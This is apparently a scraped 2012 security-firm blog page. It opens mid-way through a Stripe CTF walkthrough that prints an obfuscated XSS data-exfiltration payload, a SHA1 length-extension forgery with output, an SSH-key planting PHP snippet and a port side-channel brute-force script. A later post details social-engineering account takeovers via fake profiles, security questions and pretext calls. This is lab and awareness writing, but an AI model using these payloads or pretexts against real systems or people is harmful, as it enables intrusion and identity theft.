</script><script>$(document).ready(function() {eval(String.fromCharCode(36,46,103,101,116,40,39,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,32,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,118,97,108,117,101,32,61,32,101,115,99,97,112,101,40,100,97,116,97,41,59,32,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,41))});</script><script>//
We can now wait and watch posts being created–you can simply keep an eye on /ajax/posts so that your XSS won’t also hit yourself. You’ll soon see a new post by the Level7 user that consists of a huge block of URL-encoded characters. Go ahead and decode them and you’ll see something like…

Level 7:

Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.
Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.
Log in to your account at with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone, or you can read it below. You may find the sample API client in particularly helpful.
This level was a slight twist, you’ll actually be doing an attack on their crypto. Looking at the code you’ll see that they’re using SHA1 hashes that are composed of the raw request that you made plus your secret. We also need to be making a request as a premium user. If you attempted to order a waffle, you’ll receive a confirmation number–in this case if you order the premium waffle, the confirmation number will be your password to Level8.
Here is the block of code that verifies the signature… this is how we know how it is built and that it is sha1
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

h = hashlib.sha1()
h.update(secret + raw_params)
print computed signature, h.hexdigest(), for body, repr(raw_params)
if h.hexdigest() != sig:
raise BadSignature(signature does not match)
return True

Researching on SHA1 we can see that it has a length-extension attack vulnerability, a type of attack on certain hashes which allow inclusion of extra information. There’s excellent documentation that describes this attack in the Flickr API Signature Forgery Vulnerability write-up. There’s also a nice script and write-up about it at vnsecurity by RD, about how he solved a similar CodeGate 2010 challenge. For my solution I used the script that was supplied on vnsecurity to solve this problem. Since we know what the raw request will be, and we know the length of the secret (14), we can append stuff to the raw request and generate a valid hash. So looking at the /logs/ directory, we can also view other users requests… in this case we’re interested in premium users, so id 1 or 2.
This is a request that was made by user_id 1:
As you can see, we have the raw request and the final hash… let’s append to this and generate a new valid hash, but ordering  a different waffle.
droogie$ python ’14’ ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo’ ‘a75edb45bc6c0057e059b23bc48b84f7081a798f’ ‘&waffle=liege’
new msg: ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege’
new sig: 4c230b26a20f192c4a258f529662d3dd0ad8b62d
And here we are… the script has supplied the correct amount of padding needed and gave us the raw required and a valid hash… let’s go ahead and make the request using a simple python script….
droogie$ cat
import urllib
import urllib2
url = ‘’
data = ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege|sig:4c230b26a20f192c4a258f529662d3dd0ad8b62d’
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
droogie$ python
{“confirm_code”: “BdxavaMIKC“, “message”: “Great news: 10 liege waffles will soon be flying your way!”, “success”: true}

Level 8:

Welcome to the final level, Level 8.
HINT 1: No, really, we’re not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won’t change.
Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accesible at
PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["", ...]} to PasswordDB, which will respond with a{"success": true}" or {"success": false}" to you and your specified webhook endpoints.
(For example, try running curl -d '{"password": "password-to-check", "webhooks": []}'.)
In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.)
To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
You can obtain the code for PasswordDB from git clone, or simply read the source below.

This level seems to be a little involved, but it’s easy to understand once you see what it is doing. There is a primary server, and when you launch it you supply it a 12 digit password and a socket to listen on. It will break the password up into 4 chunks of 3 characters each and spawn 4 chunk servers. Each chunk server will have a chunk from the primary and all of your requests will be compared to it. The primary server can then receive requests from you with a password. It will chunk up the supplied password and check with the chunk servers; if it receives TRUE on all 4 it will respond with TRUE, but FALSE on any of them and you’ll get a FALSE. Your goal is to figure out what is the 12 digit password that was supplied to the primary server on startup. When making a request to the primary server you can also supply it with a webhook, where it will send the response to whichever socket you supplied.

There’s a major issue here with their design….
If we bruteforce the 12 digit password, we would be looking at this many attempts:
>>> 10**12
If we bruteforce the chunks, we’re looking at a total of this many:
>>> 10**3*4
Or only a maximum of 1000 attempts per chunk. They’ve just significantly lowered their security if there is any possible way we can tell if a chunk was correct or not, which there is of course 😉
Since the network is so locked down, we can’t actually touch the chunk servers themselves… if we could, we would just bruteforce each chunk and this challenge would be very simple… so we have to find another way to bruteforce each chunk. We also can’t try a timing attack because the developers have implemented some delays on responses to avoid this.
Well one thing we can do is get on the local network so that we can get responses from Level8, using Level2 as the description suggested.
Let’s go ahead and create a local ssh key we can use, then upload it to the Level2 server using that file upload vulnerability.
$h = fopen(“../../.ssh/authorized_keys”, “w+”);
fwrite($h,”ssh-rsa (MYSECRETLOCALSSHKEY)nn”);
print “DONE!n”;
Cool, now we can ssh into this box:
Linux 2.6.32-347-ec2 #52-Ubuntu SMP Fri Jul 27 14:38:36 UTC 2012 x86_64 GNU/Linux
Ubuntu 10.04.4 LTS
Welcome to Ubuntu!
 * Documentation:
Last login: Mon Aug 27 03:45:20 2012 from
groups: cannot find name for group ID 4334
At this point we can create sockets and receive responses from the primary server through our webhook parameters. We’ll be able to take advantage of this and use it as a side channel attack to validate if our requests were true or false. We’ll do this by keeping track of the connections to our socket and their srcport. By default, most operating systems are lazy and will use the last srcport + 1 on a connection… so with an invalid request we know that the difference between source ports would be 2… connection to chunk server 1, then back to us with the response. But if our first chunk happened to be successful it would make a request to chunk server 1, then chunk server 2, then us… so if we are able to make an attempt multiple times and see a difference of 3 in the srcports, we know that it was a valid chunk. We can obviously repeat this process and keep track of the differences to verify the first 3 chunks, then we can just bruteforce the last chunk manually. Here’s a python script written by my co-worker Michael which does just that….

#!/usr/bin/env python

import socket
import urllib2
import json
import sys

import argparse
parser = argparse.ArgumentParser()
parser.add_argument(“–port”, default=49567, type=int, help=”Which port to listen for incoming connections on”)
parser.add_argument(“targetURL”, help=”The URL of the targed primary server”)
parser.add_argument(“webhooksHost”, help=”Where the primary server should connect back for the webhooks”)
args = parser.parse_args()
except ImportError:
# level02 server doesn’t have argparse… grrr
class args(object):
port = 49567
targetURL = sys.argv[1]
webhooksHost = sys.argv[2]

def password_gen(length, prefix=””, charset=”1234567890″):
def gen(length, charset):
if length == 0:
yield “”
for ch in charset:
for pw in gen(length – 1, charset):
yield pw + ch

for pw in gen(length – len(prefix), charset):
yield prefix + pw

def do_webhooks_connectback():
c_sock, addr  = webhook_sock.accept()
c_sock.send(“HTTP/1.0 200rnrn”)
return addr[1]

def do_auth_request(password):
print “Trying password:”, password
r = urllib2.urlopen(args.targetURL, json.dumps({“password”:password, “webhooks”:webhook_hosts}))
port = do_webhooks_connectback()
result = json.loads(

print “Connect back Port:”, port

if result[“success”]:
print “Found the password!!!”
print result
return port

def calc_chunk_servers_for_password(password):
# we need to figure out what the “current” port is, so make a request that will fail
base_port = do_auth_request(“aaa”)
# figure out what the last port number is
final_port = do_auth_request(password)
# we should be able to tell how many chunk servers it talked too
return (final_port – base_port) – 1

# create the listen socket
webhook_sock = socket.socket()
webhook_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
webhook_sock.bind((“”, args.port))

webhook_hosts = [“%s:%d” % (args.webhooksHost, args.port)]

# We can guess our password by calculating how many TCP connections the primary server has
# made before connecting to our webhook. The more connections the server has made,
# the more chunks that we have correct.

prefix = “”
curr_chunk = 1

while True:
for pw in password_gen(12, prefix):
found_chunk = True
for i in xrange(10):
num_servers = calc_chunk_servers_for_password(pw)
print “Num Servers:”, num_servers
if num_servers == curr_chunk:
# incorrect password
found_chunk = False
elif num_servers > curr_chunk:
# we may have figured out a chunk… but someone else may have just made a request
# so we will just try again
elif num_servers < 0:
# ran out of ports and we restarted the port range
# somehow we regressed… abort!
print “[!!!!] Hmmm… somehow we ended up talking to fewer servers than before…”
if found_chunk:
# ok, we are fairly confident that we have found the next password chunk
prefix = pw[:curr_chunk * 3] # assuming 4 chunk servers, with 3 chars each… TODO: should calc this
curr_chunk += 1
print “[!] Found chunk:”, prefix

INSIGHTS | August 17, 2012

One Mail to Rule Them All

This small research project was conducted over a four-week period a while back, so current methods may differ as password restoration methods change.

While writing this blog post, the Gizmodo writer Mat Honan’s account was hacked with some clever social engineering that ultimately brought numerous small bits and pieces of information together into one big chunk of usable data. The downfall in all this is that different services use different alternative methods to reset passwords: some have you enter the last four digits of your credit card and some would like to know your mother’s maiden name; however, the attacks described here differ a bit, but the implications are just as devastating.
For everything we do online today we need an identity, a way to be contacted. You register on some forum because you need an answer, even if it’s just once and just to read that answer. Afterwards, you have an account there, forcing you to trust the service provider. You register on Facebook, LinkedIn, and Twitter; some of you use online banking services, dating sites, and online shopping. There’s a saying that all roads lead to Rome? Well, the big knot in this thread is—you guessed it—your email address.


Normal working people might have 1-2 email addresses: a work email that belongs to the company and a private one that belongs to the user. Perhaps the private one is one of the popular web-based email services like Gmail or Hotmail. To break it down a bit, all the sensitive info in your email should be stored in a secure vault, home, or in a bank because it’s important information that, in an attackers hand, could turn your life into a nightmare.


I live in a EU country where our social security numbers aren’t considered information worthy of protecting and can be obtained by anyone. Yes, I know—it’s a huge risk. But in some cases you need some form of identification to pick up the sent package. Still, I consider this a huge risk.


Physically, I use paper destroyers when I’ve filed a paper and then put it in my safe. I destroy the remnants of important stuff I have read. Unfortunately, storing personal data in your email is easy, convenient, and honestly, how often do you DELETE emails anyway? And if you do, are you deleting them from the trash right away? In addition, there’s so much disk space that you don’t have to care anymore. Lovely.


So, you set your email account at the free hosting service and you have to select a password. Everybody nags nowadays to have a secure and strong password. Let’s use 03L1ttl3&bunn13s00!—that’s strong, good, and quite easy to remember. Now for the secure question. Where was your mother born? What’s your pets name? What’s your grandparent’s profession? Most people pick one and fill it out.


Well, in my profession security is defined by the weakest link; in this case disregarding human error and focusing on the email alone. This IS the weakest link. How easy can this be? I wanted to dive in to how my friends and family have set theirs up, and how easy it is to find this information, either by goggling it or doing a social engineering attack. This is 2012, people should be smarter…right? So with mutual agreement obtained between myself, friends, and family, this experiment is about to begin.


A lot of my friends and former colleagues have had their identities stolen over the past two years, and there’s a huge increase. This has affected some of them to the extent that they can’t take out loans without going through a huge hassle. And it’s not often a case that gets to court, even with a huge amount of evidence including video recordings of the attackers claiming to be them, picking up packages at the local postal offices. 
Why? There’s just too much area to cover, and less man power and competence to handle it. The victims need to file a complaint, and use the case number and a copy of the complaint; and fax this around to all the places where stuff was ordered in their name. That means blacklisting themselves in their system, so if they ever want to shop there again, you can imagine the hassle of un-blacklisting yourself then trying to prove that you are really you this time.


A good friend of mine was hiking in Thailand and someone got access to his email, which included all his sensitive data: travel bookings, bus passes, flights, hotel reservations. The attacker even sent a couple of emails and replies, just to be funny; he then canceled the hotel reservations, car transportations, airplane tickets, and some of the hiking guides. A couple days later he was supposed to go on a small jungle hike—just him, his camera, and a guide—the guide never showed up, nor did his transportation to the next location. 
Thanks a lot. Sure, it could have been worse, but imagine being stranded in a jungle somewhere in Thailand with no Internet. He also had to make a couple of very expensive phone calls, ultimately abort his photography travel vacation, and head on home.


One of my best friends uses Gmail, like many others. While trying a password restore on that one, I found an old Hotmail address, too. Why? When I asked him about it afterwards, he said he had his Hotmail account for about eight years, so it’s pretty nested in with everything and his thought was, why remove it? It could be good to go back and find old funny stuff, and things you might forget. He’s not keen to security and he doesn’t remember that there is a secret question set. So I need that email.
Lets use his Facebook profile as a public attacker would—it came out empty, darn; he must be hiding his email. However, his friends are displayed. Let’s make a fake profile based on one of his older friends—the target I chose was a girl he had gone to school with. How do I know that? She was publicly sharing a photo of them in high school. Awesome. Fake profile ready, almost identical to the girl, same photo as hers, et cetera. And Friend Request Sent.
A lot of email vendors and public boards such as Facebook have started to implement phone verification, which is a good thing. Right? So I decided to play a small side experiment with my locked mobile phone.
I choose a dating site that has this feature enabled then set up an account with mobile phone verification and an alternative email. I log out and click Forgot password? I enter my username or email, “IOACasanova2000,” click and two options pop up: mobile phone or alternative email. My phone is locked and lying on the table. I choose phone. Send. My phone vibrates and I take a look at the display:  From “Unnamed Datingsite” “ZUGA22”. That’s all I need to know to reset the password.
Imagine if someone steals or even lends your phone at a party. Or if you’re sloppy enough to leave in on a table. I don’t need your pin—at least not for that dating site.What can you do to protect yourself from this?   Edit the settings so the preview shows less of the message. My phone shows three lines of every SMS; that’s way too much. However, on some brands you can disable SMS notifications from showing up on a locked screen.
From my screen i got a instant; Friend Request Accepted.
I quickly check my friend’s profile and see:


I had a dog, and his name was BINGO! Hotmail dot com and password reset.


The anti bot algorithm… done…
And the Secret question is active…
“What’s your mother’s maiden name”…


I already know that, but since I need to be an attacker, I quickly check his Facebook, which shows his mother’s maiden name! I type that into Hotmail and click OK….


New Password: this1sAsecret!123$


I’m half way there….


Another old colleague of mine got his Hotmail hacked and he was using the simple security question “Where was your mother born”. It was the same city she lived in today and that HE lived in, Malmö (City in Sweden). The attack couldn’t have come more untimely as he was on his way, in an airplane, bound for the Canary Islands with his wife. After a couple of hours at the airport, his flight, and a taxi ride, he gets  a “Sorry, you don’t have a reservation here sir.” from the clerk. His hotel booking was canceled.


Most major sites are protected with advanced security appliances and several audits are done before a site is approved for deployment, which makes it more difficult for an attacker to find vulnerabilities using direct attacks aimed at the provided service. On the other hand, a lot of companies forget to train their support personnel and that leaves small gaps. As does their way of handling password restoration. All these little breadcrumbs make a bun in the end, especially when combined with information collected from other vendors and their services—primarily because there’s no global standard for password retrieval. Nor what should, and should not be disclosed over the phone.


You can’t rely on the vendor to protect you—YOU need to take precautions yourself. Like destroying physical papers, emails, and vital information. Print out the information and then destroy the email. Make sure you empty the email’s trashcan feature (if your client offers one) before you log out. Then file the printout and put it in your home safety box. Make sure that you minimize your mistakes and the information available about you online. That way, if something should happen with your service provider, at least you know you did all you could. And you have minimized the details an attacker might get.


I think you heard this one before, but it bears repeating: Never use the same password twice!
I entered my friend’s email in Gmail’s Forgot Password and answered the anti-bot question.
There we go; I quickly check his Hotmail and find the Gmail password restore link. New password, done.

Now for the gold: his Facebook. Using the same method there, I gained access to his Facebook; he had Flickr as well…set to login with Facebook. How convenient. I now own his whole online “life”.. There’s an account at an online electronics store; nice, and it’s been approved for credit.

An attacker could change the delivery address and buy stuff online. My friend would be knee deep in trouble. Theres also a iTunes account tied to his email, which would allow me to remote-erase his phones and pads. Lucky for him, I’m not that type of attacker.


Why would anyone want to have my information? Maybe you’re not that important; but consider that maybe I want access to your corporate network. I know you are employed because of that LinkedIn group. Posting stuff in that group with a malicious link from your account is more trustworthy than just a stranger with a URL. Or maybe you’re good friends with one of the admins—what if I contact him from your account and mail, and ask him to reset your corporate password to something temporary?
I’ve tried the method on six of my friends and some of my close relatives (with permission, of course). It worked on five of them. The other one had forgot what she put as the security question, so the question wasn’t answered truthfully. That saved her.
When I had a hard time finding information, I’d used voice-changing software on my computer, transforming my voice to that of a girl. Girls are gentle and less likely to try a hoax you; that’s how the mind works. Then I’d use Skype to dial them, telling them that I worked for the local church historical department, and the records about their grandfather were a bit hard to read. We are currently adding all this into a computer so people could more easily do ancestor searching and in this case, what I wanted was her grandfather’s profession. So I asked a couple of question then inserted the real question in the middle. Like the magician I am. Mundus vult decipi is latin for; The world wan’t to be decived.
In this case, it was easy.
She wasn’t suspicious at all I thanked her for her trouble and told her I would send two movie tickets as a thank you. And I did.
Another quick fix you can do today while cleaning your email? Use an email forwarder and make sure you can’t log into the email provided with the forwarding email. For example, in my domain there’s the email “” that is use for registering on forums and other random sites. This email doesn’t have a login, which means you can’t really log into the email provider with that email. And mail is then forwarded to the real address. An attacker trying to reset that password would not succeed.
Create a new email such as “” and use THIS email for important stuff, such as online shopping, etc. Don’t disclose it on any social sites or use it to email anyone; this is just a temporary container for your online shopping and password resets from the shopping sites. Remember what I said before? Print it, delete it. Make sure you add your mobile number as a password retrieval option to minimize the risk.
It’s getting easier and easier to use just one source for authentication and that means if any link is weak, you jeopardize all your other accounts aswell. You also might pose a risk to your employer.
INSIGHTS | August 8, 2012

Impressions from Black Hat, Defcon, BSidesLV and IOAsis

A week has passed since the Las Vegas craziness and we’ve had some time to write down our impressions about the Black Hat, Defcon and BSidesLV conferences as well as our own IOAsis event.

It was great for me to meet lots of people—some of who I only see once a year in Las Vegas. I think this is one of the great things about these events: being able to talk for at least a couple of minutes with colleagues and friends you don’t see regularly (the Vegas craziness doesn’t allow long chats most of the time). I also got to meet people personally for the first time after working together and/or communicating just by email, Twitter, or chat. The IOActive team delivered a lot of successful talks that were well received by the public, which makes me proud of our great team and reflects well our constant hard work.

By Fernando Anaboldi


Fwknop at IOAsis:

The “Single Packet Authorization” term was first mentioned by MadHat at the BlackHat Briefings in July 2005; however, the first available implementation of SPA was the release of fwknop in May 2005 by Michael Rash. Basically, it grants access to a service upon receiving a particular packet.

We had the opportunity at the IOAsis to attend a fwknop presentation given by Michael Rash. The tool is currently capable of performing several useful things:

·         It allows you to hide a service on a “closed” port.
·         It lets you create a “ghost service” where a port switches for a short period of time to whatever service is requested within an SPA packet (e.g. SSHD)—and it doesn’t seem to be susceptible to replay attacks like a normal port knocking implementation would.
·         And the list goes on.


Hidden and obscuring available services on external networks looks like a first interesting line of defense, and fwknop seems to be the leader in that field.


By Ian Amit @iiamit


BlackHat/BSides/Defcon Week: Finding My Peace


After finally recovering from a week (which felt like a month) in Vegas, I can safely say that I found my peace. Although it was one of the more hectic weeks I’ve had this year—and the most successful BlackHat/BSides/Defcon personally—I managed to find myself in a better place professionally, socially, and generally. How did this come about?


Although BlackHat has been wandering the past few years between what it used to be—a highly professional security conference—and what it started to become (for me at least)—a vendor dog-and-pony show—I thought the new format of tracks focused on different security elements made a difference in how attendees approached the topics. Additionally, the arsenal pods allowed more free-form presentations and discussions on new technologies and ideas while capitalizing on the hallway-track that conferences so famously miss out on.


My schedule really put me in a position to appreciate the entire spectrum of our amazing community: speaking at BlackHat first thing in the morning after the keynote, switching gears to volunteer for the security staff at BSidesLV, and then speaking at BSides. From the more polished feel of BlackHat to the relaxed atmosphere of BSides, from a stressful speaking slot to giving back to the community, it just made perfect sense…


Having a chance to get together with people I consider friends online and offline was another critical aspect of my week in Vegas. Although some of these meetings were ridiculously short, the energy, and the relationship boost they gave was invaluable. A critical part of being in information security is the ability to work with industry peers in ways that nurture critical thinking, innovation, and peer-support (and criticism). Being able to throw around research initiatives; explore new elements of the information security world; and talk about business, government, international relations, law, economics, physical security, and other crazy aspects that we all need to take into account is a must-have in an industry that has almost zero-tolerance for failure.


Wrapping it up with a massive Defcon attendance, talks, and of course the occasional party was the cherry on top. Although some nights felt more like work than play, you won’t hear me complaining because even though party hopping between 4–5 venues to catch up with everyone really took its toll physically, I got to see a beautiful sunrise over the desert.


Last but definitely not least, getting the chance to meet with co-workers from around the globe was a great experience made possible by working for a company large enough to have people in almost every time zone. So, being able to do that against the backdrop of an amazing Freakshow party (thanks again to Keith Myers and Infected Mushroom) just made all the talks about exploits, kernel space vulnerabilities, counter-intelligence, and social engineering that much more appropriate ?


Until the next Vegas, stay safe!
INSIGHTS | July 19, 2012

IOActive Las Vegas 2012

That time of the year is quickly approaching and there will be nothing but great talks and enjoyment. As a leading security and research company, IOActive will be sharing a lot of our latest research at BlackHat USA 2012, BSidesLV 2012, and IOAsis.  And, of course, we’ll also be offering some relaxation and party opportunities, too!

This year we are proud to be one of the companies with more talks accepted than anyone else at BlackHat USA 2012, an incredible showing that backs up our team’s hard work:
We also will be showing interesting tools at BlackHat Arsenal:
·         BURP EXTENSIBILITY SUITE by James Lester and Joseph Tartaro
…and we will be presenting at BSidesLV 2012, too:
·         OCCUPY BURP SUITE: Informing the 99% What the 1% are Taking Advantage Of, by James Lester and Joseph Tartaro
But wait, that’s not all—at same time as BlackHat and BSidesLV we will be running IOAsis, where VIPs can meet with our team and also attend exclusive talks, where our team will present their latest research. 
Enough already? No, there’s still more. For the second year IOActive will be sponsoring BarCon, an exclusive, invitation-only event where the great hacking minds get together to talk about who knows what. And to drink. 
And last, but certainly not least, IOActive will present the fifth annual Defcon Freakshow, the freakiest party for celebrating Defcon 20!  More information is available on the Facebook page:


If you are not tired of reading yet, continue and find more information about our talks at BlackHat USA 2012 and BSidesLV 2012:

July 25, 2012. 5:00–6:00pm. BlackHat USA 2012

PLCs, smart meters, SCADA, Industrial Control Systems…nowadays all those terms are well known for the security industry. When critical Infrastructures come into play, the security of all those systems and devices that control refineries, and water treatment or nuclear plants pose a significant attack vector.

For years, the isolation of that world provided the best ‘defense’ but things are changing and that scenario is no longer valid. Is it feasible to attack a power plant without ever visiting one? Is it possible to hack into a smart meter…without having that smart meter? Yes, it is. This talk discusses the approach followed to do so, mixing theory and practice.

This presentation pivots around the analysis of firmware through reverse engineering in order to discover additional scenarios such as backdoors, confidential documentation or software, and vulnerabilities. Everything explained will be based on real cases, unveiling curious ‘features’ found in industrial devices and disclosing some previously unknown details of an interesting case: a backdoor discovered in a family of smart meters.

We will navigate through the dark waters of Industrial Control Systems, where security by obscurity has ruled for years. Join us on this journey, here be backdoors…

July 25, 2012. 2:15–3:15pm. BlackHat USA 2012

Industrial systems are widely believed to be air-gapped. At previous Black Hat conferences, people have demonstrated individual utilities control systems directly connected to the internet. However, this is not an isolated incident of failure, but rather a disturbing trend. By visualizing results from SHODAN over a 2-1/2–year period, we can see that there are thousands of exposed systems around the world. By using geo-location and vulnerability pattern matching to service banners, we can see their rough physical location and the numbers of standard vulnerabilities they are exposed to.

This allows us to look at statistics about the industrial system security posture of whole nations and regions. During the process of this project, I worked with ICS-CERT to inform asset-owners of their exposure and other CERT teams around the world. The project has reached out to 63 countries, and sparked discussion of convergence toward the public internet of many insecure protocols and devices.
The original dissertation can be found here:

July 26, 2012. 5:00–6:00pm BlackHat USA 2012

For some common local kernel vulnerabilities there is no general, multi-version, reliable way to exploit them. While there have been interesting techniques published, they are neither simple nor do they work across different Windows versions most of the time. This presentation will show easy and reliable cross-platform techniques for exploiting some common local Windows kernel vulnerabilities. These new techniques even allow exploitation of vulnerabilities that have been considered difficult or almost impossible to exploit in the past.

July 25, 2012. 10:15–11:15am.BlackHat USA 2012
July 25, 2012. 5:00–6:00 pm. BSidesLV 2012

Offensive talks are easy, I know. But the goal of offensive security at the end of the day is to make us better defenders. And that’s hard. After the penetration testers (or worse, the red team) leaves, there’s usually a whole lot of vulnerabilities, exposures, threats, risks and wounded egos. Now comes the money time—can you fix this so your security posture will actually be better the next time these guys come around?

This talk focuses mainly on what should be done, not what should be BOUGHT—you probably have most of what you need already in place and you just don’t know it yet.
The talk will show how to expand the spectrum of defenders from a reactive one to a proactive one, will discuss ways to perform intelligence gathering on your opponents, and will model how that can assist in focusing on an effective defense rather than a “best practice” one. Methodically, defensively, decisively. The red team can play ball cross-court, so should you!

BURP EXTENSIBILITY SUITE, by James Lester and Joseph Tartaro
July 25, 2012. 3:30–4:30 pm BlackHat USA 2012 – Arsenal

Whether it be several Class B Subnets, a custom web application utilizing tokenization, or the integration of third-party detection/exploitation software, there comes a time when your go-to testing application is insufficient as is. With Burp Suite Extensibility you can push these requirements to the next level by building functionality that allows you to perform your required task while maintaining efficiency, value, and, most of all, detection/exploitation of the specified target. Several extensions along with a common extensibility framework will be on display to demonstrate its ability, adaptation, and ease of use while still reaching your testing requirements. Along with the demonstration, these extensions will be released to the public during the week of BlackHat to encourage further development and extensibility participation.

OCCUPY BURP SUITE: Informing the 99% What the 1% are Taking Advantage Of, by James Lester and Joseph Tartaro
July 26, 2012. 3:00–4:00 pm BSidesLV 2012

In this presentation, James Lester and Joseph Tartaro will focus on building demand, support, and an overall desire around the creation of Burp Suite extensions with the hope of bringing extensibility to the forefront of web application testing. Lester and Tartaro will introduce up to a dozen extensions they’ve created that utilize currently-accessible functionality within the extensibility suite. Along with the release of these extensions, a campaign will be presented to organize and develop an extension community that documents tool primers, lessons learned, and tips/tricks; and hosts extensions and tools catered to Burp. Something learned isn’t research until it’s shared—putting this statement into practice, the duo believes that BSides is the perfect environment to help collect data, convey interests, and share results.
INSIGHTS | July 16, 2012

The Value of Data

Have you ever entered an office and seen a pile of money sitting unattended and easily accessible on a desk? How many people in your company have a key or combination to a safe with money inside and can open that safe without any controls? Do you leave money in a non-secure place that everyone knows about and can freely access?

Your probable answer to all these questions is NO, which makes sense—what doesn’t make sense is how so many companies don’t think the same way about data. I think data is worth a lot of money if you consider how important it is in terms of cost to the company: cost when it’s stolen, cost when it’s not available, et cetera. Data deserves to be protected as if it were money, but most of it is freely available by way of corporate databases; once you access the database you can play with the data at will, bypassing only modest controls or restrictions.
Of course you need a username and password to make the initial connection or exploit a SQL injection vulnerability (for example), but we all know it’s not that difficult to get access, as shown by recent events. A lot of user passwords have been leaked, obtained from successfully-hacked companies that apparently didn’t protect their data properly and, as a result, put their business at serious risk.
The main cause of data breaches is an improperly-secured database. Unfortunately, when it comes to database security, most companies are ages away from doing it properly.
For example, if the statement used to access a table is always:
Select * from user_accounts where user_email = X
why would you let anyone execute the next SQL statement:
Select * from user_accounts
Why not use stored procedures exclusively and remove all direct access to tables? Why not set alerts to trigger when common SQL injection-related errors occur? Why not monitor the database in real time to detect suspicious activities? Why not create a table named “important_data_is_here” and fire all the alarms when someone tries to access it?
Database servers don’t have advanced security features, but there are numerous third-party solutions that do—Database Activity Monitoring (DAM: a kind of database IPS) being one example—and a very small percentage of companies are using them. This isn’t just about using a DAM product (which won’t solve all your problems anyway), but it does provide a good start, allowing you to know in “real time” whether someone is digging around and playing with your databases.  
If you don’t want to spend money on third-party solutions, there are ways to do customized DAM builds using database-provided functionality that involves creating alerts on specific actions, setting custom permissions on different database objects, monitoring and analyzing logs, creating a database honeypot and querying and analyzing system tables; however, when you have dozens (or hundreds) of databases, the difficulty level increases quickly and you’ll need to have database security-wise personnel in place.
I’ve researched database security for more than 10 years and have seen database software vendors seriously improve the security of their products, but I have yet to see noticeable improvements at the company level—as indicated by all the breaches we know and don’t know about—corporations still don’t seem to get that data is money.
ADVISORIES | July 13, 2012

Invensys Wonderware InTouch 10 DLL Hijack

ICS-CERT originally released Advisory ICSA-12-177-01P on the US-CERT Portal on July 05, 2012. The web page’s release was delayed to provide the vendor with enough time to contact customers concerning this information.

Independent researcher Carlos Mario Penagos Hollmann has identified an uncontrolled search path element vulnerability, commonly referred to as a DLL hijack, in the Invensys Wonderware InTouch application. Successfully exploiting this vulnerability could lead to arbitrary code execution.

ICS-CERT has coordinated the report with Invensys, which has produced an upgrade to address this vulnerability. Mr. Hollmann has validated that the upgrade resolves the reported vulnerability. (more…)